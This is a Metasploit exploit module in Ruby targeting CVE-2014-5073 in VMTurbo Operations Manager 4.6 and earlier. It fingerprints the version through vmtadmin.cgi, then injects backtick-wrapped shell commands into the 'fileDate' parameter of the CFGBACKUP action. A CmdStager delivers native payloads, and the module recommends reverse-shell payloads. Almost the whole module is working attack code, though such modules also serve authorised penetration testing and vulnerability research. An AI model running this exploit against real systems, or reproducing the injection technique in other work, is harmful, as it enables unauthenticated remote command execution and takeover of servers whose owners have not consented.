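##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::EXE

  # Banner format returned by vmtadmin.cgi for the VERSIONS action. The
  # release string is dotted-decimal, the build number is a plain integer.
  VERSION_RE = /vmtbuild:(?<build>\d+),vmtrelease:(?<release>[\d.]+),vmtbits:\d+,osbits:\d+/.freeze

  # Thresholds used by #check: releases up to and including this one, with a
  # build below this number, are reported as vulnerable.
  LAST_VULN_RELEASE = '4.6'.freeze
  FIXED_BUILD = 28657

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',
        'Description' => %q{
          VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
          OS Command injection in the web interface. Use reverse payloads for the most
          reliable results. Since it is a blind OS command injection vulnerability,
          there is no output for the executed command when using the cmd generic payload.
          Port binding payloads are disregarded due to the restrictive firewall settings.

          This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
          4.6.
        },
        'Author' => [
          # Secunia Research - Discovery and Metasploit module
          'Emilio Pinna <emilio.pinn[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-5073'],
          ['OSVDB', '109572'],
          ['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']
        ],
        'DisclosureDate' => '2014-06-25',
        'Privileged' => false,
        'Platform' => %w[linux unix],
        'Payload' => {
          'Compat' => {
            'ConnectionType' => '-bind'
          }
        },
        'Targets' => [
          [
            'Unix CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [
            'VMTurbo Operations Manager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 1,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # #exploit pins the stager flavor to :printf, so neither option has any
    # effect and they are hidden from the user.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Queries the version banner and classifies the target.
  #
  # Release and build are compared as a version and an integer rather than as
  # strings: lexicographically "10.6" <= "4.6" and "9999" < "28657" both hold,
  # which would misclassify later releases.
  #
  # @return [Exploit::CheckCode] Unknown when the banner cannot be fetched or
  #   parsed, Appears/Safe from the release and build thresholds otherwise
  def check
    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'vars_get' => {
          'callType' => 'ACTION',
          'actionType' => 'VERSIONS'
        }
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error('Failed to connect to the web server')
      return Exploit::CheckCode::Unknown
    end

    banner = res && res.code == 200 && VERSION_RE.match(res.body)
    unless banner
      vprint_status('Unexpected vmtadmin.cgi response')
      return Exploit::CheckCode::Unknown
    end

    release = banner[:release]
    build = banner[:build].to_i
    vprint_status("VMTurbo Operations Manager version #{release} build #{build} detected")

    # The regex admits strings like "4.." that are not valid versions.
    begin
      release_version = Rex::Version.new(release)
    rescue ArgumentError
      vprint_status("Unparseable version string #{release}")
      return Exploit::CheckCode::Unknown
    end

    if release_version <= Rex::Version.new(LAST_VULN_RELEASE) && build < FIXED_BUILD
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends one command through the fileDate parameter of the CFGBACKUP
  # download action. The injection is blind; the HTTP response carries no
  # command output.
  #
  # @param cmd [String] command to send
  # @param _opts [Hash] CmdStager options, unused by this module
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, or nil when
  #   the connection failed. Returning the response lets #exploit distinguish
  #   a dropped connection from a delivered request.
  def execute_command(cmd, _opts)
    res = send_request_cgi(
      'uri' => '/cgi-bin/vmtadmin.cgi',
      'method' => 'GET',
      'vars_get' => {
        'callType' => 'DOWN',
        'actionType' => 'CFGBACKUP',
        'fileDate' => "\"`#{cmd}`\""
      }
    )
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    vprint_error('Failed to connect to the web server')
    nil
  else
    vprint_status("Sent command #{cmd}")
    res
  end

  # Dispatches on the selected target: a single command shot for the CMD
  # target, the CmdStager upload for the native target.
  def exploit
    if target.name =~ /CMD/
      res = execute_command(payload.encoded, {})
      fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") unless res

      # Blind injection: a delivered request is all that can be observed.
      print_status('Blind Exploitation - unknown exploitation state')
      return
    end

    # Native payload upload via the CmdStager mixin, printf flavor.
    execute_cmdstager(flavor: :printf)
  end
end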